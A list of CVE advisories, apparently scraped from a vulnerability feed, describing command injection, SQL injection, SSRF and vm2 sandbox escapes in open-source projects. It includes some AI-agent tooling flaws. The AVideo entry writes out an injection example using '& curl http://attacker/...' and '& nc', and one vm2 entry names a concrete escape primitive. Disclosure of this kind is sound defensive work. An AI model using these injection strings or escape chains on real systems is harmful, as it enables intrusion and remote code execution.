CVE-2018-7160 8.8 high 9.0% nodejs, node.js The Node.js inspector, in 6.x and later is vulnerable to a DNS rebinding attack which could be exploited to perform remote code execution. An attack is possible from malicious websites open in a web browser on the same computer, or another computer with network access to the computer running the Node.js process. A malicious website could use a DNS rebinding attack to trick the web browser to bypass same-origin-policy checks and to allow HTTP connections to localhost or to hosts on the local network. If a Node.js process with the debug port active is running on localhost or on a host on the local network, the malicious website could connect to it as a debugger, and get full code execution access. 8 Oct
CVE-2026-40871 7.2 high 9.0% no CPE yet mailcow: dockerized is an open source groupware/email suite based on docker. Versions prior to 2026-03b have a second-order SQL injection vulnerability in the quarantine_category field via the Mailcow API. The /api/v1/add/mailbox endpoint stores quarantine_category without validation or sanitization. This value is later used by quarantine_notify.py, which constructs SQL queries using unsafe % string formatting instead of parameterized queries. This results in a delayed (second-order) SQL injection when the quarantine notification job executes, allowing an attacker to inject arbitrary SQL. Using a UNION SELECT, sensitive data (e.g., admin credentials) can be exfiltrated and rendered inside quarantine notification emails. Version 2026-03b fixes the vulnerability. Mon 26 Oct
CVE-2026-40343 6.9 medium 9.0% free5gc, udr free5GC UDR is the user data repository (UDR) for free5GC, an an open-source project for 5th generation (5G) mobile core networks. In versions up to and including 1.4.2, a fail-open request handling flaw in the UDR service causes the `/nudr-dr/v2/policy-data/subs-to-notify` POST handler to continue processing requests even after request body retrieval or deserialization errors. This may allow unintended creation of Policy Data notification subscriptions with invalid, empty, or partially processed input, depending on downstream processor behavior. As of time of publication, a patched version is not available. Mon 26 Oct
CVE-2026-54069 9.2 critical 7.0% no CPE yet SiYuan is an open-source personal knowledge management system. Prior to 3.7.0, SiYuan Note's kernel HTTP server unconditionally trusts all chrome-extension:// origins, granting RoleAdministrator access to every installed browser extension without any authentication. Combined with the default empty AccessAuthCode on desktop installs, any Chrome/Chromium extension -- including a compromised legitimate extension via supply chain attack -- can make fully authenticated admin API calls to the SiYuan kernel at 127.0.0.1:6806, enabling data exfiltration, stored XSS injection, and configuration tampering. This vulnerability is fixed in 3.7.0. 25 Oct
CVE-2026-40321 8.0 high 6.0% dnnsoftware, dotnetnuke DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to version 10.2.2, a user could upload a specially crafted SVG file that could include scripts that can target both authenticated and unauthenticated DNN users. The impact is increased if the scripts are run by a power user. Version 10.2.2 patches the issue. Mon 26 Oct
CVE-2021-21409 5.9 medium 5.0% netty, debian, debian_linux, oncommand_api_services Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.61.Final there is a vulnerability that enables request smuggling. The content-length header is not correctly validated if the request only uses a single Http2HeaderFrame with the endStream set to to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. This is a followup of GHSA-wm47-8v5p-wjpj/CVE-2021-21295 which did miss to fix this one case. This was fixed as part of 4.1.61.Final. 8 Oct
CVE-1999-0024 5.0 medium 5.0% isc, bsdi, bind, bsd_os, aix DNS cache poisoning via BIND, by predictable query IDs. 9 Oct
CVE-2025-65958 7.1 high 4.0% openwebui, open_webui Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.37, a Server-Side Request Forgery (SSRF) vulnerability in Open WebUI allows any authenticated user to force the server to make HTTP requests to arbitrary URLs. This can be exploited to access cloud metadata endpoints (AWS/GCP/Azure), scan internal networks, access internal services behind firewalls, and exfiltrate sensitive information. No special permissions beyond basic authentication are required. This vulnerability is fixed in 0.6.37. 18 Oct
CVE-2022-29824 6.5 medium 4.0% xmlsoft, fedoraproject, libxml2, libxslt, fedora In libxml2 before 2.9.14, several buffer handling functions in buf.c (xmlBuf*) and tree.c (xmlBuffer*) don't check for integer overflows. This can result in out-of-bounds memory writes. Exploitation requires a victim to open a crafted, multi-gigabyte XML file. Other software using libxml2's buffer functions, for example libxslt through 1.1.35, is affected as well. 14 Oct
CVE-2018-1000880 6.5 medium 4.0% libarchive, canonical, ubuntu_linux, fedora libarchive version commit 9693801580c0cf7c70e862d305270a16b52826a7 onwards (release v3.2.0 onwards) contains a CWE-20: Improper Input Validation vulnerability in WARC parser - libarchive/archive_read_support_format_warc.c, _warc_read() that can result in DoS - quasi-infinite run time and disk usage from tiny file. This attack appear to be exploitable via the victim must open a specially crafted WARC file. 8 Oct
CVE-2026-54068 5.9 medium 4.0% no CPE yet SiYuan is an open-source personal knowledge management system. Prior to 3.7.0, the /api/icon/getDynamicIcon endpoint is explicitly excluded from authentication in SiYuan's kernel router (router.go, "不需要鉴权" -- no auth needed). When called with type=8 and a valid block id parameter, this endpoint invokes RenderDynamicIconContentTemplate, which executes a Go template that includes the querySQL and queryBlocks functions. These functions run arbitrary SELECT statements against the SiYuan SQLite database. An unauthenticated network-adjacent attacker who knows a valid block ID can exfiltrate all user note content, tags, asset references, and block attributes from the database. This vulnerability is fixed in 3.7.0. 25 Oct
CVE-2025-11490 2.1 low 4.0% wonderwhy-er, desktopcommandermcp A vulnerability has been found in wonderwhy-er DesktopCommanderMCP up to 0.2.13. The affected element is the function extractBaseCommand of the file src/command-manager.ts of the component Absolute Path Handler. Such manipulation leads to os command injection. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The vendor explains: "The usual use case is that AI is asked to do something, picks commands itself, and typically uses simple command names without absolute paths. It's curious why a user would ask the model to bypass restrictions this way. (...) This could potentially be a problem, but we are yet to hear reports of this being an issue in actual workflows. We'll leave this issue open for situations where people may report this as a problem for the long term." 8 Oct
CVE-2026-41492 9.8 critical 3.0% dgraph Dgraph is an open source distributed GraphQL database. Prior to 25.3.3, Dgraphl exposes the process command line through the unauthenticated /debug/vars endpoint on Alpha. Because the admin token is commonly supplied via the --security "token=..." startup flag, an unauthenticated attacker can retrieve that token and replay it in the X-Dgraph-AuthToken header to access admin-only endpoints. This is a variant of the previously fixed /debug/pprof/cmdline issue, but the current fix is incomplete because it blocks only /debug/pprof/cmdline and still serves http.DefaultServeMux, which includes expvar's /debug/vars handler. This vulnerability is fixed in 25.3.3. 25 Oct
CVE-2025-66210 9.4 critical 3.0% coollabs, coolify Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.451, an authenticated command injection vulnerability in the Database Import functionality allows users with application/service management permissions to execute arbitrary commands as root on managed servers. Database names used in import operations are passed directly to shell commands without sanitization, enabling full remote code execution. Version 4.0.0-beta.451 fixes the issue. 19 Oct
CVE-2025-66211 9.4 critical 3.0% coollabs, coolify Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.451, an authenticated command injection vulnerability in PostgreSQL Init Script Filename handling allows users with application/service management permissions to execute arbitrary commands as root on managed servers. PostgreSQL initialization script filenames are passed to shell commands without proper validation, enabling full remote code execution. Version 4.0.0-beta.451 fixes the issue. 19 Oct
CVE-2025-66212 9.4 critical 3.0% coollabs, coolify Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.451, an authenticated command injection vulnerability in the Dynamic Proxy Configuration Filename handling allows users with application/service management permissions to execute arbitrary commands as root on managed servers. Proxy configuration filenames are passed to shell commands without proper escaping, enabling full remote code execution. Version 4.0.0-beta.451 fixes the issue. 19 Oct
CVE-2025-66213 9.4 critical 3.0% coollabs, coolify Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.451, an authenticated command injection vulnerability in the File Storage Directory Mount Path functionality allows users with application/service management permissions to execute arbitrary commands as root on managed servers. The file_storage_directory_source parameter is passed directly to shell commands without proper sanitization, enabling full remote code execution on the host system. Version 4.0.0-beta.451 fixes the issue. 19 Oct
CVE-2026-34599 8.8 high 3.0% no CPE yet Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to 4.0.0-beta.471, there is an authenticated command injection vulnerability in the GetLogs Livewire component which allows users with team membership (lowest privilege member role) to execute arbitrary commands as root on managed servers. The $container Livewire public property is interpolated directly into shell commands (docker logs, docker service logs) without sanitization, and can be modified by any client via the Livewire wire protocol because it lacks the #[Locked] attribute. This issue is fixed in version 4.0.0-beta.471. 25 Oct
CVE-2026-55173 8.1 high 3.0% no CPE yet WWBN AVideo is an open source video platform. Versions 29.0 and below remain vulnerable to OS command injection because the fix for CVE-2026-33482 was incomplete and still does not neutralize a single & ( the shell background operator). CVE-2026-33482 reported that sanitizeFFmpegCommand() (plugin/API/standAlone/functions.php) failed to strip $(...) command substitution, allowing OS command injection at the execAsync() sh -c sink. The fix (commit 25c8ab90) added $, (, ), {, }, \n, \r to the denylist character class and a str_replace('&&', '', ...), but did not account for the single &. ffmpeg.json.php builds the command from _decryptString(getInput('codeToExecEncrypted')). This is the same threat model the original advisory accepted (“an attacker who can craft a valid encrypted payload can achieve arbitrary command execution on the standalone encoder server”) and the same CVSS basis (AV:N/AC:H/PR:N). Multiple &-separated commands can be chained (e.g. download + execute). Redirect-based payloads are blocked by the > strip, but command execution (e.g. & curl http://attacker/..., & nc ..., dropping/running a file) is not. This issue has been patched by this commit: https://github.com/WWBN/AVideo/commit/c1cfa2bea8a351a1d07f5758f82887403e3abf1f. 24 Oct
CVE-2025-10925 7.8 high 3.0% gimp GIMP ILBM File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of ILBM files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27793. 19 Oct
CVE-2019-1010180 7.8 high 3.0% gnu, opensuse, gdb, leap GNU gdb All versions is affected by: Buffer Overflow - Out of bound memory access. The impact is: Deny of Service, Memory Disclosure, and Possible Code Execution. The component is: The main gdb module. The attack vector is: Open an ELF for debugging. The fixed version is: Not fixed yet. 14 Oct
CVE-2026-60102 7.7 high 3.0% no CPE yet Horde Virtual File System (VFS) API before 3.0.1 contains an OS command injection vulnerability in the Horde_Vfs_Smb driver where the _escapeShellCommand() method fails to sanitize command substitution sequences, allowing authenticated attackers to inject arbitrary shell commands through user-controlled filenames. Attackers can supply malicious filenames containing unescaped command substitution payloads through operations such as file upload, folder creation, rename, or deletion, which are interpolated into a double-quoted shell context and executed via proc_open() through /bin/sh -c before smbclient runs, resulting in arbitrary command execution on the underlying system. 25 Oct
CVE-2019-20907 7.5 high 3.0% python, opensuse, leap, debian_linux In Lib/tarfile.py in Python through 3.8.3, an attacker is able to craft a TAR archive leading to an infinite loop when opened by tarfile.open, because _proc_pax lacks header validation. 14 Oct
CVE-2021-28861 7.4 high 3.0% python, fedoraproject, fedora Python 3.x through 3.10 has an open redirection vulnerability in lib/http/server.py due to no protection against multiple (/) at the beginning of URI path which may leads to information disclosure. NOTE: this is disputed by a third party because the http.server.html documentation page states "Warning: http.server is not recommended for production. It only implements basic security checks." 14 Oct
CVE-2026-73297 6.9 medium 3.0% no CPE yet Microsoft UFO open-source framework for intelligent automation across devices and platforms. Prior to 3.0.8, _is_blocked_ip in ufo/utils/url_security.py did not block NAT64 prefixes 64:ff9b::/96 and 64:ff9b:1::/48, the 6to4 prefix 2002::/16, or the Teredo prefix 2001::/32 and did not re-check embedded IPv4 destinations, allowing an unauthenticated remote attacker who can influence URLs processed by validate_url to bypass the SSRF guard and reach cloud metadata, internal services, or localhost. This issue is fixed in version 3.0.8. 24 Oct
CVE-2018-1257 6.5 medium 3.0% vmware, redhat, spring_framework, openshift, agile_product_lifecycle_management Spring Framework, versions 5.0.x prior to 5.0.6, versions 4.3.x prior to 4.3.17, and older unsupported versions allows applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a regular expression, denial of service attack. 8 Oct
CVE-2018-1000879 6.5 medium 3.0% libarchive, fedoraproject, fedora, leap libarchive version commit 379867ecb330b3a952fb7bfa7bffb7bbd5547205 onwards (release v3.3.0 onwards) contains a CWE-476: NULL Pointer Dereference vulnerability in ACL parser - libarchive/archive_acl.c, archive_acl_from_text_l() that can result in Crash/DoS. This attack appear to be exploitable via the victim must open a specially crafted archive file. 8 Oct
CVE-2026-44359 10.0 critical 2.0% no CPE yet Meshtastic is an open source mesh networking solution. Prior to version 2.7.21.1370b23, the Meshtastic GitHub repository's main_matrix.yml workflow is triggered by pull_request_target and multiple jobs check out the attacker's fork code and execute it with access to repository secrets and elevated GITHUB_TOKEN permissions. No approval gate exists. Pull requests from external users with author_association: "NONE" triggered the CI workflow automatically. The workflow directly executes attacker-controlled files from the fork checkout. This issue could have resulted in supply chain compromise, self-hosted runner compromise, and/or repository takeover for the repo. This issue is separate from GHSA-6mwm-v2vv-pp96, which addressed a command injection via github.head_ref in the setup job of the same workflow. That fix correctly moved to environment variables. However, the more critical fork checkout vulnerability across the check, build, and build-debian-src jobs was not addressed. Version 2.7.21.1370b23 contains a patch for thie issue. 24 Oct
CVE-2026-34976 10.0 critical 2.0% dgraph Dgraph is an open source distributed GraphQL database. Prior to 25.3.1, the restoreTenant admin mutation is missing from the authorization middleware config (admin.go), making it completely unauthenticated. Unlike the similar restore mutation which requires Guardian-of-Galaxy authentication, restoreTenant executes with zero middleware. This mutation accepts attacker-controlled backup source URLs (including file:// for local filesystem access), S3/MinIO credentials, encryption key file paths, and Vault credential file paths. An unauthenticated attacker can overwrite the entire database, read server-side files, and perform SSRF. This vulnerability is fixed in 25.3.1. 24 Oct
CVE-2026-48168 10.0 critical 2.0% no CPE yet PraisonAI is a multi-agent teams system. In versions prior to 4.6.40, the bundled Claude GitHub Actions workflow is vulnerable to command injection because it embeds an attacker-controlled pull request branch name into a Bash run: block without quoting or validation. Additionally, the workflow allows any @claude comment to trigger the job regardless of whether the commenter is a trusted collaborator. An outside contributor can open a pull request from a fork whose branch name contains shell metacharacters and comment @claude, causing Bash to execute arbitrary shell code in the GitHub Actions runner. Because these commands run in a job holding a GitHub App token with write permissions, OIDC access, and gh/git access, the injection can be chained through $GITHUB_PATH to compromise later privileged steps, enabling repository writes, pull request and issue manipulation, or OIDC-token abuse. This issue has been fixed in version 4.6.40. 23 Oct
CVE-2026-47210 9.8 critical 2.0% no CPE yet vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.4, a sandbox escape vulnerability in vm2 allows arbitrary code execution in the host process when untrusted code is executed with async support on runtimes exposing WebAssembly JSPI (WebAssembly.promising / WebAssembly.Suspending). In the tested configuration, a JSPI-backed Promise can reach Promise.prototype.finally() in a way that bypasses the expected Promise-species hardening and exposes a host-originated rejection object to attacker-controlled species logic, breaking the sandbox boundary. This issue has been patched in version 3.11.4. Mon 26 Oct
CVE-2026-40887 9.1 critical 2.0% no CPE yet Vendure is an open-source headless commerce platform. Starting in version 1.7.4 and prior to versions 2.3.4, 3.5.7, and 3.6.2, an unauthenticated SQL injection vulnerability exists in the Vendure Shop API. A user-controlled query string parameter is interpolated directly into a raw SQL expression without parameterization or validation, allowing an attacker to execute arbitrary SQL against the database. This affects all supported database backends (PostgreSQL, MySQL/MariaDB, SQLite). The Admin API is also affected, though exploitation there requires authentication. Versions 2.3.4, 3.5.7, and 3.6.2 contain a patch. For those who are unable to upgrade immediately, Vendure has made a hotfix available that uses `RequestContextService.getLanguageCode` to validate the `languageCode` input at the boundary. This blocks injection payloads before they can reach any query. The hotfix replaces the existing `getLanguageCode` method in `packages/core/src/service/helpers/request-context/request-context.service.ts`. Invalid values are silently dropped and the channel's default language is used instead. The patched versions additionally convert the vulnerable SQL interpolation to a parameterized query as defense in depth. Mon 26 Oct
CVE-2026-41304 8.9 high 2.0% wwbn, avideo WWBN AVideo is an open source video platform. In versions 29.0 and below, the `cloneServer.json.php` endpoint in the CloneSite plugin constructs shell commands using user-controlled input (`url` parameter) without proper sanitization. The input is directly concatenated into a `wget` command executed via `exec()`, allowing command injection. An attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., `;`). This leads to Remote Code Execution (RCE) on the server. Commit 473c609fc2defdea8b937b00e86ce88eba1f15bb contains a fix. Mon 26 Oct
CVE-2026-41247 8.9 high 2.0% std42, elfinder elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Prior to 2.1.67, elFinder contains a command injection vulnerability in the resize command. The bg (background color) parameter is accepted from user input and passed through image resize/rotate processing. In configurations that use the ImageMagick CLI backend, this value is incorporated into shell command strings without sufficient escaping. An attacker able to invoke the resize command with a crafted bg value may achieve arbitrary command execution as the web server process user. This vulnerability is fixed in 2.1.67. Mon 26 Oct
CVE-2026-44177 8.8 high 2.0% no CPE yet Kirby is an open-source content management system. In versions 5.3.0 and above but prior to 5.4.1, Kirby did not correctly validate the provided user ID, resulting in a path traversal vulnerability. Version 5.3.0 introduced a performance improvement to the Users collection that loaded user objects lazily when first needed. Users were queried by their ID, which was then used to locate the corresponding account directory under site/accounts. This affected the authentication API (accessible to unauthenticated requests), the users API (accessible only to authenticated users), and any other place that uses $users->find() to look up an individual user by a request-provided email or ID. As a result, an attacker could trigger arbitrary PHP file inclusion of files named index.php (for example, the main PHP files of plugins), the impact of which depends on the logic those files contain. It also allowed probing for the existence of arbitrary directories on the server, letting attackers fingerprint the server and site setup, including installed plugins and the content structure. This issue has been fixed in version 5.4.1. 24 Oct
CVE-2026-45322 7.8 high 2.0% no CPE yet Microsoft UFO open-source framework for intelligent automation across devices and platforms. Microsoft UFO tagged releases up to and including v3.0.0 contain an OS command injection vulnerability in the shell action replay path. In affected releases, ShellReceiver.run_shell() passes a command string from action parameters directly to subprocess.Popen() with shell=True and executable=powershell.exe. The same shell-execution behavior is also reachable through ShellReceiver.execute_command(). The shell receiver is invoked by action classes such as RunShellCommand.execute() and ExecuteCommand.execute(), which forward stored action parameters to the shell receiver. Because UFO stores planned and executed actions in per-session JSON records, an attacker who can write or modify a session/action JSON file can plant a shell action. When the session is resumed or replayed, UFO executes the attacker's command as the UFO process user. Mon 26 Oct
CVE-2026-53755 7.5 high 2.0% kidocode, crawl4ai Crawl4AI is an open-source LLM friendly web crawler & scraper. Prior to 0.8.9, the Docker API server applied its SSRF destination check to the crawl target URL only, not to the proxy address. An unauthenticated request could supply a proxy pointing at an internal IP and route the browser through it, reaching internal services and cloud-metadata endpoints, while using a perfectly valid crawl URL. The Docker API is unauthenticated by default. /crawl, /crawl/stream, and /crawl/job accept a browser_config (and crawler_config). The following all feed Chromium's egress and were unchecked: browser_config.proxy_config.server, browser_config.proxy (deprecated field), crawler_config.proxy_config.server, and --proxy-server / --proxy-pac-url / --proxy-bypass-list / --host-resolver-rules flags in browser_config.extra_args. This vulnerability is fixed in 0.8.9. 25 Oct
CVE-2026-54066 7.5 high 2.0% no CPE yet SiYuan is an open-source personal knowledge management system. Prior to 3.7.0, the patch for CVE-2026-41894 ("Path Traversal via Double URL Encoding") sanitized the /export/ route but the identical root cause remains in the /assets/*path route. In publish mode (anonymous read-only HTTP endpoint, default port 6808), an unauthenticated remote attacker can read arbitrary files inside WorkspaceDir — including conf/conf.json (which contains the AccessAuthCode SHA256 hash, API token, and sync keys), temp/siyuan.db, temp/blocktree.db, and siyuan.log — by double-URL-encoding .. segments. This vulnerability is fixed in 3.7.0. 25 Oct
CVE-2026-57193 6.9 medium 2.0% no CPE yet Asterisk is an open source private branch exchange and telephony toolkit. Prior to Asterisk 20.20.1, 21.12.3, 22.10.1, 23.4.1 and Certified Asterisk 20.7-cert11, 22.8-cert3, the LDAP realtime driver `res_config_ldap` may permit `LDAP filter injection` through a `SIP username`, allowing an unauthenticated attacker to make arbitrary LDAP queries using carefully crafted SIP packets and disclose information. The `res_config_ldap` module must be loaded and configured to access an LDAP server, which is not the default. This issue is fixed in Asterisk 20.20.1, 21.12.3, 22.10.1, 23.4.1 and Certified Asterisk 20.7-cert11, 22.8-cert3. Sat 31 Oct
CVE-2021-21290 5.5 medium 2.0% netty, debian, debian_linux, quarkus Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty before version 4.1.59.Final there is a vulnerability on Unix-like systems involving an insecure temp file. When netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. On unix-like systems, the temporary directory is shared between all user. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern MacOS Operating Systems. The method "File.createTempFile" on unix-like systems creates a random file, but, by default will create this file with the permissions "-rw-r--r--". Thus, if sensitive information is written to this file, other local users can read this information. This is the case in netty's "AbstractDiskHttpData" is vulnerable. This has been fixed in version 4.1.59.Final. As a workaround, one may specify your own "java.io.tmpdir" when you start the JVM or use "DefaultHttpDataFactory.setBaseDir(...)" to set the directory to something that is only readable by the current user. 8 Oct
CVE-2026-40911 10.0 critical 1.0% wwbn, avideo WWBN AVideo is an open source video platform. In versions 29.0 and prior, the YPTSocket plugin's WebSocket server relays attacker-supplied JSON message bodies to every connected client without sanitizing the `msg` or `callback` fields. On the client side, `plugin/YPTSocket/script.js` contains two `eval()` sinks fed directly by those relayed fields (`json.msg.autoEvalCodeOnHTML` at line 568 and `json.callback` at line 95). Because tokens are minted for anonymous visitors and never revalidated beyond decryption, an unauthenticated attacker can broadcast arbitrary JavaScript that executes in the origin of every currently-connected user (including administrators), resulting in universal account takeover, session theft, and privileged action execution. Commit c08694bf6264eb4decceb78c711baee2609b4efd contains a fix. Mon 26 Oct
CVE-2026-39337 10.0 critical 1.0% churchcrm ChurchCRM is an open-source church management system. Prior to 7.1.0, critical pre-authentication remote code execution vulnerability in ChurchCRM's setup wizard allows unauthenticated attackers to inject arbitrary PHP code during the initial installation process, leading to complete server compromise. The "$dbPassword" variable is not sanitized. This vulnerability exists due to an incomplete fix for CVE-2025-62521. This vulnerability is fixed in 7.1.0. Mon 26 Oct
CVE-2026-26332 10.0 critical 1.0% vm2_project, vm2 vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.0, SuppressedError allows attackers to escape the sandbox and run arbitrary code. This issue has been patched in version 3.11.0. Mon 26 Oct
CVE-2026-42288 10.0 critical 1.0% no CPE yet ChurchCRM is an open-source church management system. Prior to 7.3.2, The fix for CVE-2026-39337 is incomplete. The pre-authentication remote code execution vulnerability in ChurchCRM's setup wizard via unsanitized DB_PASSWORD remains fully exploitable This vulnerability is fixed in 7.3.2. Mon 26 Oct
CVE-2026-43997 10.0 critical 1.0% vm2_project, vm2 vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.0, it is possible to obtain the host Object. There are various ways to use the host Object, to escape the sandbox, one example would be using HostObject.getOwnPropertySymbols to obtain Symbol(nodejs.util.inspect.custom). This vulnerability is fixed in 3.11.0. Mon 26 Oct
CVE-2026-44005 10.0 critical 1.0% vm2_project, vm2 vm2 is an open source vm/sandbox for Node.js. From 3.9.6 to 3.10.5, vm2's bridge exposes mutable proxies for real host-realm intrinsic prototypes and then forwards sandbox writes into the underlying host objects with otherReflectSet() and otherReflectDefineProperty(), which lets attacker-controlled JavaScript running in a default VM or inherited NodeVM mutate shared host Object.prototype, Array.prototype, and Function.prototype from inside the sandbox This vulnerability is fixed in 3.11.0. Mon 26 Oct
CVE-2026-44006 10.0 critical 1.0% vm2_project, vm2 vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.0, It is possible to reach BaseHandler.getPrototypeOf, which can be used to get arbitrary prototypes. This vulnerability is fixed in 3.11.0. Mon 26 Oct
CVE-2026-47131 10.0 critical 1.0% no CPE yet vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.4, by combining Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__"), Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__"), and Node.js's ERR_INVALID_ARG_TYPE Error, the host's TypeError constructor can be obtained, which allows the escape from the sandbox. This allows attackers to run arbitrary code. This issue has been patched in version 3.11.4. Mon 26 Oct
CVE-2026-47140 10.0 critical 1.0% no CPE yet vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.4, NodeVM blocks several dangerous Node.js builtins such as module, worker_threads, cluster, vm, repl, and inspector. However, the denylist misses process and inspector/promises. Both can be used from sandboxed code to reach host-side execution primitives. This allows sandboxed code to bypass the intended builtin restrictions and execute code in the host process. This issue has been patched in version 3.11.4. Mon 26 Oct
CVE-2026-47208 10.0 critical 1.0% no CPE yet vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.4, VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. This issue has been patched in version 3.11.4. Mon 26 Oct
